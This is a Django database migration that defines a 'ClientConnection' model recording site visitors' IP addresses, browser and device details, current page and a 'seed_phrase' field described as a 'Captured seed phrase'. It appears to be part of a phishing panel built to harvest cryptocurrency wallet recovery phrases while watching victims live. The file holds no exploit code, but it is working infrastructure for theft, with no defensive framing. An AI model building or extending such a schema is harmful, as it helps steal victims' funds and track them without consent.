# Generated by Django 5.2.1 on 2025-05-29 11:10

import django.utils.timezone
from django.db import migrations, models


class Migration(migrations.Migration):

    dependencies = [
        ('dashboard', '0004_delete_visitorlog'),
    ]

    operations = [
        migrations.CreateModel(
            name='ClientConnection',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('client_id', models.CharField(help_text='Unique identifier for the client (e.g., session ID or a generated UUID)', max_length=100, unique=True)),
                ('ip_address', models.GenericIPAddressField()),
                ('status', models.CharField(choices=[('visible', 'Visible'), ('hidden', 'Hidden')], default='hidden', max_length=20)),
                ('is_connected', models.BooleanField(default=False, help_text="True if the user has 'connected' (e.g., submitted data)")),
                ('last_seen', models.DateTimeField(default=django.utils.timezone.now)),
                ('first_seen', models.DateTimeField(auto_now_add=True)),
                ('current_page_name', models.CharField(blank=True, help_text='Friendly name of the current page', max_length=100, null=True)),
                ('current_page_url', models.CharField(blank=True, max_length=2048, null=True)),
                ('user_agent', models.TextField(blank=True, null=True)),
                ('browser_name', models.CharField(blank=True, max_length=100, null=True)),
                ('browser_version', models.CharField(blank=True, max_length=50, null=True)),
                ('device_type', models.CharField(blank=True, max_length=50, null=True)),
                ('os_name', models.CharField(blank=True, max_length=100, null=True)),
                ('os_version', models.CharField(blank=True, max_length=50, null=True)),
                ('timezone', models.CharField(blank=True, max_length=100, null=True)),
                ('seed_phrase', models.TextField(blank=True, help_text='Captured seed phrase, if any', null=True)),
            ],
            options={
                'verbose_name': 'Client Connection',
                'verbose_name_plural': 'Client Connections',
                'ordering': ['-last_seen'],
            },
        ),
    ]
